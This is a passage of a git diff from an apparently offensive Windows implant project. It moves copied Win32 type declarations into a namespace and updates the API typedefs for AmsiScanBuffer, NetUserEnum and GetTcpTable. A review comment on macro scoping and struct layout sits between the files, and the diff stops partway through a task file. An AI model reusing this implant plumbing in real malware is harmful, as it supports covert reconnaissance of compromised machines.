diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp
index ae3d25f..b3b7a8a 100644
--- a/payload/win/implant/include/core/procs.hpp
+++ b/payload/win/implant/include/core/procs.hpp
@@ -305,7 +305,7 @@ namespace Procs
 // AdjustTokenPrivileges
 typedef BOOL (WINAPI* LPPROC_ADJUSTTOKENPRIVILEGES)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
 // AmsiScanBuffer
- typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result);
+ typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(Win32::HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, Win32::HAMSISESSION amsiSession, Win32::AMSI_RESULT *result);
 // BCryptCloseAlgorithmProvider
 typedef NTSTATUS (WINAPI* LPPROC_BCRYPTCLOSEALGORITHMPROVIDER)(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags);
 // BCryptDecrypt
@@ -367,7 +367,7 @@ namespace Procs
 // FreeLibrary
 typedef BOOL (WINAPI* LPPROC_FREELIBRARY)(HMODULE hLibModule);
 // GetAdaptersAddresses
- typedef ULONG (WINAPI* LPPROC_GETADAPTERSADDRESSES)(ULONG Family, ULONG Flags, PVOID Reserved, PIP_ADAPTER_ADDRESSES AdapterAddresses, PULONG SizePointer);
+ typedef ULONG (WINAPI* LPPROC_GETADAPTERSADDRESSES)(ULONG Family, ULONG Flags, PVOID Reserved, Win32::PIP_ADAPTER_ADDRESSES AdapterAddresses, PULONG SizePointer);
 // GetComputerNameW
 typedef BOOL (WINAPI* LPPROC_GETCOMPUTERNAMEW)(LPWSTR lpBuffer, LPDWORD nSize);
 // GetEnvironmentStringsW
@@ -397,7 +397,7 @@ namespace Procs
 // GetSystemTime
 typedef VOID (WINAPI* LPPROC_GETSYSTEMTIME)(LPSYSTEMTIME lpSystemTime);
 // GetTcpTable
- typedef ULONG (WINAPI* LPPROC_GETTCPTABLE)(PMIB_TCPTABLE TcpTable, PULONG SizePointer, BOOL Order);
+ typedef ULONG (WINAPI* LPPROC_GETTCPTABLE)(Win32::PMIB_TCPTABLE TcpTable, PULONG SizePointer, BOOL Order);
 // GetTokenInformation
 typedef BOOL (WINAPI* LPPROC_GETTOKENINFORMATION)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
 // GetUserNameW
@@ -441,11 +441,11 @@ namespace Procs
 // MoveFileW
 typedef BOOL (WINAPI* LPPROC_MOVEFILEW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName);
 // NetApiBufferFree
- typedef NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer);
+ typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer);
 // NetLocalGroupEnum
- typedef NET_API_STATUS (WINAPI* LPPROC_NETLOCALGROUPENUM)(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD_PTR resumehandle);
+ typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETLOCALGROUPENUM)(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD_PTR resumehandle);
 // NetUserEnum
- typedef NET_API_STATUS (WINAPI* LPPROC_NETUSERENUM)(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD resume_handle);
+ typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETUSERENUM)(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD resume_handle);
 // OpenProcess
 typedef HANDLE (WINAPI* LPPROC_OPENPROCESS)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
 // OpenProcessToken
diff --git a/payload/win/implant/include/core/win32.hpp b/payload/win/implant/include/core/win32.hpp
index 1a5a79c..5522751 100644
--- a/payload/win/implant/include/core/win32.hpp
+++ b/payload/win/implant/include/core/win32.hpp
@@ -1,344 +1,349 @@ #ifndef HERMIT_CORE_WIN32_HPP #define HERMIT_CORE_WIN32_HPP -#define MAX_DNS_SUFFIX_STRING_LENGTH 256 -#define MAX_ADAPTER_ADDRESS_LENGTH 8 -#define MAX_DHCPV6_DUID_LENGTH 130 - -// ------------------------------------------------------------------ -// amsi.h -// ------------------------------------------------------------------ - -typedef HANDLE HAMSICONTEXT; -typedef HANDLE HAMSISESSION; - -typedef enum { - AMSI_RESULT_CLEAN, - AMSI_RESULT_NOT_DETECTED, - AMSI_RESULT_BLOCKED_BY_ADMIN_START, - AMSI_RESULT_BLOCKED_BY_ADMIN_END, - AMSI_RESULT_DETECTED -} AMSI_RESULT; - -// ------------------------------------------------------------------ -// ifdef.h -// ------------------------------------------------------------------ - -typedef DWORD NET_API_STATUS; -typedef ULONG NET_IFINDEX; -typedef NET_IFINDEX IF_INDEX; -typedef ULONG IFTYPE; -typedef UINT32 NET_IF_COMPARTMENT_ID; - -typedef enum { - IfOperStatusUp = 1, - IfOperStatusDown, - IfOperStatusTesting, - IfOperStatusUnknown, - IfOperStatusDormant, - IfOperStatusNotPresent, - IfOperStatusLowerLayerDown -} IF_OPER_STATUS; - -typedef enum _NET_IF_CONNECTION_TYPE { - NET_IF_CONNECTION_DEDICATED = 1, - NET_IF_CONNECTION_PASSIVE = 2, - NET_IF_CONNECTION_DEMAND = 3, - NET_IF_CONNECTION_MAXIMUM = 4 -} NET_IF_CONNECTION_TYPE, *PNET_IF_CONNECTION_TYPE; - -// ------------------------------------------------------------------ -// iphlpapi.h -// ------------------------------------------------------------------ - -#define GAA_FLAG_INCLUDE_PREFIX 0x0010 - -typedef union _NET_LUID_LH { - ULONG64 Value; - struct { - ULONG64 Reserved : 24; - ULONG64 NetLuidIndex : 24; - ULONG64 IfType : 16; - } Info; -} NET_LUID_LH, *PNET_LUID_LH; -typedef union _NET_LUID_LH NET_LUID_LH; -typedef NET_LUID_LH NET_LUID; -typedef NET_LUID IF_LUID; - -typedef enum { - IpPrefixOriginOther = 0, - IpPrefixOriginManual, - IpPrefixOriginWellKnown, - IpPrefixOriginDhcp, - IpPrefixOriginRouterAdvertisement -} IP_PREFIX_ORIGIN; - -typedef 
enum { - NlsoOther = 0, - NlsoManual, - NlsoWellKnown, - NlsoDhcp, - NlsoLinkLayerAddress, - NlsoRandom, - IpSuffixOriginOther = 0, - IpSuffixOriginManual, - IpSuffixOriginWellKnown, - IpSuffixOriginDhcp, - IpSuffixOriginLinkLayerAddress, - IpSuffixOriginRandom, - IpSuffixOriginUnchanged = 1 << 4 -} NL_SUFFIX_ORIGIN; - -typedef enum { - NldsInvalid, - NldsTentative, - NldsDuplicate, - NldsDeprecated, - NldsPreferred, - IpDadStateInvalid = 0, - IpDadStateTentative, - IpDadStateDuplicate, - IpDadStateDeprecated, - IpDadStatePreferred, -} NL_DAD_STATE; - -typedef enum { - TUNNEL_TYPE_NONE = 0, - TUNNEL_TYPE_OTHER = 1, - TUNNEL_TYPE_DIRECT = 2, - TUNNEL_TYPE_6TO4 = 11, - TUNNEL_TYPE_ISATAP = 13, - TUNNEL_TYPE_TEREDO = 14, - TUNNEL_TYPE_IPHTTPS = 15 -} TUNNEL_TYPE, *PTUNNEL_TYPE; - -typedef NL_SUFFIX_ORIGIN IP_SUFFIX_ORIGIN; -typedef NL_DAD_STATE IP_DAD_STATE; - -// typedef struct _GUID { -// unsigned long Data1; -// unsigned short Data2; -// unsigned short Data3; -// unsigned char Data4[8]; -// } GUID; - -typedef GUID NET_IF_NETWORK_GUID; - -typedef struct _MY_SOCKET_ADDRESS { - LPSOCKADDR lpSockaddr; - INT iSockaddrLength; -} MY_SOCKET_ADDRESS, *PMY_SOCKET_ADDRESS, *LPMY_SOCKET_ADDRESS; - -typedef struct _IP_ADAPTER_UNICAST_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; - }; - }; - struct _IP_ADAPTER_UNICAST_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; - IP_PREFIX_ORIGIN PrefixOrigin; - IP_SUFFIX_ORIGIN SuffixOrigin; - IP_DAD_STATE DadState; - ULONG ValidLifetime; - ULONG PreferredLifetime; - ULONG LeaseLifetime; - UINT8 OnLinkPrefixLength; -} IP_ADAPTER_UNICAST_ADDRESS_LH, *PIP_ADAPTER_UNICAST_ADDRESS_LH; - -typedef IP_ADAPTER_UNICAST_ADDRESS_LH IP_ADAPTER_UNICAST_ADDRESS; -typedef IP_ADAPTER_UNICAST_ADDRESS_LH *PIP_ADAPTER_UNICAST_ADDRESS; - -typedef struct _IP_ADAPTER_ANYCAST_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; +namespace Win32 +{ + + #define MAX_DNS_SUFFIX_STRING_LENGTH 
256 + #define MAX_ADAPTER_ADDRESS_LENGTH 8 + #define MAX_DHCPV6_DUID_LENGTH 130 + + // ------------------------------------------------------------------ + // amsi.h + // ------------------------------------------------------------------ + + typedef HANDLE HAMSICONTEXT; + typedef HANDLE HAMSISESSION; + + typedef enum { + AMSI_RESULT_CLEAN, + AMSI_RESULT_NOT_DETECTED, + AMSI_RESULT_BLOCKED_BY_ADMIN_START, + AMSI_RESULT_BLOCKED_BY_ADMIN_END, + AMSI_RESULT_DETECTED + } AMSI_RESULT; + + // ------------------------------------------------------------------ + // ifdef.h + // ------------------------------------------------------------------ + + typedef DWORD NET_API_STATUS; + typedef ULONG NET_IFINDEX; + typedef NET_IFINDEX IF_INDEX; + typedef ULONG IFTYPE; + typedef UINT32 NET_IF_COMPARTMENT_ID; + + typedef enum { + IfOperStatusUp = 1, + IfOperStatusDown, + IfOperStatusTesting, + IfOperStatusUnknown, + IfOperStatusDormant, + IfOperStatusNotPresent, + IfOperStatusLowerLayerDown + } IF_OPER_STATUS; + + typedef enum _NET_IF_CONNECTION_TYPE { + NET_IF_CONNECTION_DEDICATED = 1, + NET_IF_CONNECTION_PASSIVE = 2, + NET_IF_CONNECTION_DEMAND = 3, + NET_IF_CONNECTION_MAXIMUM = 4 + } NET_IF_CONNECTION_TYPE, *PNET_IF_CONNECTION_TYPE; + + // ------------------------------------------------------------------ + // iphlpapi.h + // ------------------------------------------------------------------ + + #define GAA_FLAG_INCLUDE_PREFIX 0x0010 + + typedef union _NET_LUID_LH { + ULONG64 Value; + struct { + ULONG64 Reserved : 24; + ULONG64 NetLuidIndex : 24; + ULONG64 IfType : 16; + } Info; + } NET_LUID_LH, *PNET_LUID_LH; + typedef union _NET_LUID_LH NET_LUID_LH; + typedef NET_LUID_LH NET_LUID; + typedef NET_LUID IF_LUID; + + typedef enum { + IpPrefixOriginOther = 0, + IpPrefixOriginManual, + IpPrefixOriginWellKnown, + IpPrefixOriginDhcp, + IpPrefixOriginRouterAdvertisement + } IP_PREFIX_ORIGIN; + + typedef enum { + NlsoOther = 0, + NlsoManual, + NlsoWellKnown, + NlsoDhcp, + 
NlsoLinkLayerAddress, + NlsoRandom, + IpSuffixOriginOther = 0, + IpSuffixOriginManual, + IpSuffixOriginWellKnown, + IpSuffixOriginDhcp, + IpSuffixOriginLinkLayerAddress, + IpSuffixOriginRandom, + IpSuffixOriginUnchanged = 1 << 4 + } NL_SUFFIX_ORIGIN; + + typedef enum { + NldsInvalid, + NldsTentative, + NldsDuplicate, + NldsDeprecated, + NldsPreferred, + IpDadStateInvalid = 0, + IpDadStateTentative, + IpDadStateDuplicate, + IpDadStateDeprecated, + IpDadStatePreferred, + } NL_DAD_STATE; + + typedef enum { + TUNNEL_TYPE_NONE = 0, + TUNNEL_TYPE_OTHER = 1, + TUNNEL_TYPE_DIRECT = 2, + TUNNEL_TYPE_6TO4 = 11, + TUNNEL_TYPE_ISATAP = 13, + TUNNEL_TYPE_TEREDO = 14, + TUNNEL_TYPE_IPHTTPS = 15 + } TUNNEL_TYPE, *PTUNNEL_TYPE; + + typedef NL_SUFFIX_ORIGIN IP_SUFFIX_ORIGIN; + typedef NL_DAD_STATE IP_DAD_STATE; + + // typedef struct _GUID { + // unsigned long Data1; + // unsigned short Data2; + // unsigned short Data3; + // unsigned char Data4[8]; + // } GUID; + + typedef GUID NET_IF_NETWORK_GUID; + + typedef struct _MY_SOCKET_ADDRESS { + LPSOCKADDR lpSockaddr; + INT iSockaddrLength; + } MY_SOCKET_ADDRESS, *PMY_SOCKET_ADDRESS, *LPMY_SOCKET_ADDRESS; + + typedef struct _IP_ADAPTER_UNICAST_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_ANYCAST_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_ANYCAST_ADDRESS_XP, *PIP_ADAPTER_ANYCAST_ADDRESS_XP; - -typedef IP_ADAPTER_ANYCAST_ADDRESS_XP IP_ADAPTER_ANYCAST_ADDRESS; -typedef IP_ADAPTER_ANYCAST_ADDRESS_XP *PIP_ADAPTER_ANYCAST_ADDRESS; - -typedef struct _IP_ADAPTER_MULTICAST_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; + struct _IP_ADAPTER_UNICAST_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + IP_PREFIX_ORIGIN PrefixOrigin; + IP_SUFFIX_ORIGIN SuffixOrigin; + IP_DAD_STATE DadState; + ULONG ValidLifetime; + ULONG PreferredLifetime; + ULONG LeaseLifetime; + UINT8 OnLinkPrefixLength; + } 
IP_ADAPTER_UNICAST_ADDRESS_LH, *PIP_ADAPTER_UNICAST_ADDRESS_LH; + + typedef IP_ADAPTER_UNICAST_ADDRESS_LH IP_ADAPTER_UNICAST_ADDRESS; + typedef IP_ADAPTER_UNICAST_ADDRESS_LH *PIP_ADAPTER_UNICAST_ADDRESS; + + typedef struct _IP_ADAPTER_ANYCAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_MULTICAST_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_MULTICAST_ADDRESS_XP, *PIP_ADAPTER_MULTICAST_ADDRESS_XP; - -typedef IP_ADAPTER_MULTICAST_ADDRESS_XP IP_ADAPTER_MULTICAST_ADDRESS; -typedef IP_ADAPTER_MULTICAST_ADDRESS_XP *PIP_ADAPTER_MULTICAST_ADDRESS; - -typedef struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_ANYCAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_ANYCAST_ADDRESS_XP, *PIP_ADAPTER_ANYCAST_ADDRESS_XP; + + typedef IP_ADAPTER_ANYCAST_ADDRESS_XP IP_ADAPTER_ANYCAST_ADDRESS; + typedef IP_ADAPTER_ANYCAST_ADDRESS_XP *PIP_ADAPTER_ANYCAST_ADDRESS; + + typedef struct _IP_ADAPTER_MULTICAST_ADDRESS_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_DNS_SERVER_ADDRESS_XP, *PIP_ADAPTER_DNS_SERVER_ADDRESS_XP; - -typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP IP_ADAPTER_DNS_SERVER_ADDRESS; -typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP *PIP_ADAPTER_DNS_SERVER_ADDRESS; - -typedef struct _IP_ADAPTER_PREFIX_XP { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Flags; + struct _IP_ADAPTER_MULTICAST_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_MULTICAST_ADDRESS_XP, *PIP_ADAPTER_MULTICAST_ADDRESS_XP; + + typedef IP_ADAPTER_MULTICAST_ADDRESS_XP IP_ADAPTER_MULTICAST_ADDRESS; + typedef IP_ADAPTER_MULTICAST_ADDRESS_XP *PIP_ADAPTER_MULTICAST_ADDRESS; + + typedef struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP { + union { + ULONGLONG 
Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_PREFIX_XP *Next; - MY_SOCKET_ADDRESS Address; - ULONG PrefixLength; -} IP_ADAPTER_PREFIX_XP, *PIP_ADAPTER_PREFIX_XP; - -typedef IP_ADAPTER_PREFIX_XP IP_ADAPTER_PREFIX; -typedef IP_ADAPTER_PREFIX_XP *PIP_ADAPTER_PREFIX; - -typedef struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_DNS_SERVER_ADDRESS_XP *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_DNS_SERVER_ADDRESS_XP, *PIP_ADAPTER_DNS_SERVER_ADDRESS_XP; + + typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP IP_ADAPTER_DNS_SERVER_ADDRESS; + typedef IP_ADAPTER_DNS_SERVER_ADDRESS_XP *PIP_ADAPTER_DNS_SERVER_ADDRESS; + + typedef struct _IP_ADAPTER_PREFIX_XP { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Flags; + }; }; - }; - struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_WINS_SERVER_ADDRESS_LH, *PIP_ADAPTER_WINS_SERVER_ADDRESS_LH; - -typedef struct _IP_ADAPTER_GATEWAY_ADDRESS_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - DWORD Reserved; + struct _IP_ADAPTER_PREFIX_XP *Next; + MY_SOCKET_ADDRESS Address; + ULONG PrefixLength; + } IP_ADAPTER_PREFIX_XP, *PIP_ADAPTER_PREFIX_XP; + + typedef IP_ADAPTER_PREFIX_XP IP_ADAPTER_PREFIX; + typedef IP_ADAPTER_PREFIX_XP *PIP_ADAPTER_PREFIX; + + typedef struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_GATEWAY_ADDRESS_LH *Next; - MY_SOCKET_ADDRESS Address; -} IP_ADAPTER_GATEWAY_ADDRESS_LH, *PIP_ADAPTER_GATEWAY_ADDRESS_LH; - -typedef struct _IP_ADAPTER_DNS_SUFFIX { - struct _IP_ADAPTER_DNS_SUFFIX *Next; - WCHAR String[MAX_DNS_SUFFIX_STRING_LENGTH]; -} IP_ADAPTER_DNS_SUFFIX, *PIP_ADAPTER_DNS_SUFFIX; - -typedef struct _IP_ADAPTER_ADDRESSES_LH { - union { - ULONGLONG Alignment; - struct { - ULONG Length; - IF_INDEX IfIndex; 
+ struct _IP_ADAPTER_WINS_SERVER_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_WINS_SERVER_ADDRESS_LH, *PIP_ADAPTER_WINS_SERVER_ADDRESS_LH; + + typedef struct _IP_ADAPTER_GATEWAY_ADDRESS_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + DWORD Reserved; + }; }; - }; - struct _IP_ADAPTER_ADDRESSES_LH *Next; - PCHAR AdapterName; - PIP_ADAPTER_UNICAST_ADDRESS_LH FirstUnicastAddress; - PIP_ADAPTER_ANYCAST_ADDRESS_XP FirstAnycastAddress; - PIP_ADAPTER_MULTICAST_ADDRESS_XP FirstMulticastAddress; - PIP_ADAPTER_DNS_SERVER_ADDRESS_XP FirstDnsServerAddress; - PWCHAR DnsSuffix; - PWCHAR Description; - PWCHAR FriendlyName; - BYTE PhysicalAddress[MAX_ADAPTER_ADDRESS_LENGTH]; - ULONG PhysicalAddressLength; - union { - ULONG Flags; - struct { - ULONG DdnsEnabled : 1; - ULONG RegisterAdapterSuffix : 1; - ULONG Dhcpv4Enabled : 1; - ULONG ReceiveOnly : 1; - ULONG NoMulticast : 1; - ULONG Ipv6OtherStatefulConfig : 1; - ULONG NetbiosOverTcpipEnabled : 1; - ULONG Ipv4Enabled : 1; - ULONG Ipv6Enabled : 1; - ULONG Ipv6ManagedAddressConfigurationSupported : 1; + struct _IP_ADAPTER_GATEWAY_ADDRESS_LH *Next; + MY_SOCKET_ADDRESS Address; + } IP_ADAPTER_GATEWAY_ADDRESS_LH, *PIP_ADAPTER_GATEWAY_ADDRESS_LH; + + typedef struct _IP_ADAPTER_DNS_SUFFIX { + struct _IP_ADAPTER_DNS_SUFFIX *Next; + WCHAR String[MAX_DNS_SUFFIX_STRING_LENGTH]; + } IP_ADAPTER_DNS_SUFFIX, *PIP_ADAPTER_DNS_SUFFIX; + + typedef struct _IP_ADAPTER_ADDRESSES_LH { + union { + ULONGLONG Alignment; + struct { + ULONG Length; + IF_INDEX IfIndex; + }; }; - }; - ULONG Mtu; - IFTYPE IfType; - IF_OPER_STATUS OperStatus; - IF_INDEX Ipv6IfIndex; - ULONG ZoneIndices[16]; - PIP_ADAPTER_PREFIX_XP FirstPrefix; - ULONG64 TransmitLinkSpeed; - ULONG64 ReceiveLinkSpeed; - PIP_ADAPTER_WINS_SERVER_ADDRESS_LH FirstWinsServerAddress; - PIP_ADAPTER_GATEWAY_ADDRESS_LH FirstGatewayAddress; - ULONG Ipv4Metric; - ULONG Ipv6Metric; - IF_LUID Luid; - MY_SOCKET_ADDRESS Dhcpv4Server; - NET_IF_COMPARTMENT_ID CompartmentId; - 
NET_IF_NETWORK_GUID NetworkGuid; - NET_IF_CONNECTION_TYPE ConnectionType; - TUNNEL_TYPE TunnelType; - MY_SOCKET_ADDRESS Dhcpv6Server; - BYTE Dhcpv6ClientDuid[MAX_DHCPV6_DUID_LENGTH]; - ULONG Dhcpv6ClientDuidLength; - ULONG Dhcpv6Iaid; - PIP_ADAPTER_DNS_SUFFIX FirstDnsSuffix; -} IP_ADAPTER_ADDRESSES_LH, *PIP_ADAPTER_ADDRESSES_LH; - -typedef IP_ADAPTER_ADDRESSES_LH IP_ADAPTER_ADDRESSES; -typedef IP_ADAPTER_ADDRESSES_LH *PIP_ADAPTER_ADDRESSES; - -// ------------------------------------------------------------------ -// tcpmib.h -// ------------------------------------------------------------------ - -#define ANY_SIZE 1 - -typedef enum -{ - MIB_TCP_STATE_CLOSED = 1, - MIB_TCP_STATE_LISTEN = 2, - MIB_TCP_STATE_SYN_SENT = 3, - MIB_TCP_STATE_SYN_RCVD = 4, - MIB_TCP_STATE_ESTAB = 5, - MIB_TCP_STATE_FIN_WAIT1 = 6, - MIB_TCP_STATE_FIN_WAIT2 = 7, - MIB_TCP_STATE_CLOSE_WAIT = 8, - MIB_TCP_STATE_CLOSING = 9, - MIB_TCP_STATE_LAST_ACK = 10, - MIB_TCP_STATE_TIME_WAIT = 11, - MIB_TCP_STATE_DELETE_TCB = 12, -} MIB_TCP_STATE; - -typedef struct _MIB_TCPROW { + struct _IP_ADAPTER_ADDRESSES_LH *Next; + PCHAR AdapterName; + PIP_ADAPTER_UNICAST_ADDRESS_LH FirstUnicastAddress; + PIP_ADAPTER_ANYCAST_ADDRESS_XP FirstAnycastAddress; + PIP_ADAPTER_MULTICAST_ADDRESS_XP FirstMulticastAddress; + PIP_ADAPTER_DNS_SERVER_ADDRESS_XP FirstDnsServerAddress; + PWCHAR DnsSuffix; + PWCHAR Description; + PWCHAR FriendlyName; + BYTE PhysicalAddress[MAX_ADAPTER_ADDRESS_LENGTH]; + ULONG PhysicalAddressLength; union { - DWORD dwState; - MIB_TCP_STATE State; + ULONG Flags; + struct { + ULONG DdnsEnabled : 1; + ULONG RegisterAdapterSuffix : 1; + ULONG Dhcpv4Enabled : 1; + ULONG ReceiveOnly : 1; + ULONG NoMulticast : 1; + ULONG Ipv6OtherStatefulConfig : 1; + ULONG NetbiosOverTcpipEnabled : 1; + ULONG Ipv4Enabled : 1; + ULONG Ipv6Enabled : 1; + ULONG Ipv6ManagedAddressConfigurationSupported : 1; + }; }; - DWORD dwLocalAddr; - DWORD dwLocalPort; - DWORD dwRemoteAddr; - DWORD dwRemotePort; -} MIB_TCPROW, 
*PMIB_TCPROW; - -typedef struct _MIB_TCPTABLE { - DWORD dwNumEntries; - MIB_TCPROW table[ANY_SIZE]; -} MIB_TCPTABLE, *PMIB_TCPTABLE; + ULONG Mtu; + IFTYPE IfType; + IF_OPER_STATUS OperStatus; + IF_INDEX Ipv6IfIndex; + ULONG ZoneIndices[16]; + PIP_ADAPTER_PREFIX_XP FirstPrefix; + ULONG64 TransmitLinkSpeed; + ULONG64 ReceiveLinkSpeed; + PIP_ADAPTER_WINS_SERVER_ADDRESS_LH FirstWinsServerAddress; + PIP_ADAPTER_GATEWAY_ADDRESS_LH FirstGatewayAddress; + ULONG Ipv4Metric; + ULONG Ipv6Metric; + IF_LUID Luid; + MY_SOCKET_ADDRESS Dhcpv4Server; + NET_IF_COMPARTMENT_ID CompartmentId; + NET_IF_NETWORK_GUID NetworkGuid; + NET_IF_CONNECTION_TYPE ConnectionType; + TUNNEL_TYPE TunnelType; + MY_SOCKET_ADDRESS Dhcpv6Server; + BYTE Dhcpv6ClientDuid[MAX_DHCPV6_DUID_LENGTH]; + ULONG Dhcpv6ClientDuidLength; + ULONG Dhcpv6Iaid; + PIP_ADAPTER_DNS_SUFFIX FirstDnsSuffix; + } IP_ADAPTER_ADDRESSES_LH, *PIP_ADAPTER_ADDRESSES_LH; + + typedef IP_ADAPTER_ADDRESSES_LH IP_ADAPTER_ADDRESSES; + typedef IP_ADAPTER_ADDRESSES_LH *PIP_ADAPTER_ADDRESSES; + + // ------------------------------------------------------------------ + // tcpmib.h + // ------------------------------------------------------------------ + + #define ANY_SIZE 1 + + typedef enum + { + MIB_TCP_STATE_CLOSED = 1, + MIB_TCP_STATE_LISTEN = 2, + MIB_TCP_STATE_SYN_SENT = 3, + MIB_TCP_STATE_SYN_RCVD = 4, + MIB_TCP_STATE_ESTAB = 5, + MIB_TCP_STATE_FIN_WAIT1 = 6, + MIB_TCP_STATE_FIN_WAIT2 = 7, + MIB_TCP_STATE_CLOSE_WAIT = 8, + MIB_TCP_STATE_CLOSING = 9, + MIB_TCP_STATE_LAST_ACK = 10, + MIB_TCP_STATE_TIME_WAIT = 11, + MIB_TCP_STATE_DELETE_TCB = 12, + } MIB_TCP_STATE; + + typedef struct _MIB_TCPROW { + union { + DWORD dwState; + MIB_TCP_STATE State; + }; + DWORD dwLocalAddr; + DWORD dwLocalPort; + DWORD dwRemoteAddr; + DWORD dwRemotePort; + } MIB_TCPROW, *PMIB_TCPROW; + + typedef struct _MIB_TCPTABLE { + DWORD dwNumEntries; + MIB_TCPROW table[ANY_SIZE]; + } MIB_TCPTABLE, *PMIB_TCPTABLE; +} + #endif // HERMIT_CORE_WIN32_HPP 
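Review bot: The `#define` lines that now sit inside `namespace Win32` (`MAX_DNS_SUFFIX_STRING_LENGTH`, `MAX_ADAPTER_ADDRESS_LENGTH`, `MAX_DHCPV6_DUID_LENGTH`, `GAA_FLAG_INCLUDE_PREFIX`, `ANY_SIZE`) are not scoped by it: the preprocessor ignores namespaces, so these names remain global and will still clash with the SDK headers the section comments name (`iphlpapi.h`, `tcpmib.h`) if any translation unit ever includes both, while the new indentation suggests they are isolated. Either guard each one (`#ifndef ANY_SIZE` / `#define ANY_SIZE 1` / `#endif`) or replace them with namespaced constants such as `constexpr ULONG kAnySize = 1;` and use those in the array bounds. The struct layouts in this header are hand-copied and are handed to `GetAdaptersAddresses`/`GetTcpTable` through the `Procs` typedefs, so a field-order or padding mismatch against the real SDK types would become an out-of-bounds read when the returned lists are walked; a header comment recording which SDK version they mirror, plus `static_assert`s on `sizeof`/`offsetof` in a test TU that includes the genuine headers, would catch drift. `typedef union _NET_LUID_LH NET_LUID_LH;` repeats the typedef already made on the preceding union declaration and can be dropped.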
diff --git a/payload/win/implant/src/core/task/ip.cpp b/payload/win/implant/src/core/task/ip.cpp
index d10486c..7b08095 100644
--- a/payload/win/implant/src/core/task/ip.cpp
+++ b/payload/win/implant/src/core/task/ip.cpp
@@ -16,23 +16,23 @@ namespace Task
 // ULONG family = AF_INET6;
 LPVOID lpMsgBuf = NULL;
- PIP_ADAPTER_ADDRESSES_LH pAddresses = NULL;
+ Win32::PIP_ADAPTER_ADDRESSES_LH pAddresses = NULL;
 ULONG outBufLen = 0;
 ULONG Iterations = 0;
- PIP_ADAPTER_ADDRESSES_LH pCurrAddresses = NULL;
- PIP_ADAPTER_UNICAST_ADDRESS pUnicast = NULL;
- PIP_ADAPTER_ANYCAST_ADDRESS pAnycast = NULL;
- PIP_ADAPTER_MULTICAST_ADDRESS pMulticast = NULL;
- IP_ADAPTER_DNS_SERVER_ADDRESS* pDnsServer = NULL;
- PIP_ADAPTER_GATEWAY_ADDRESS_LH pGateway = NULL;
- IP_ADAPTER_PREFIX *pPrefix = NULL;
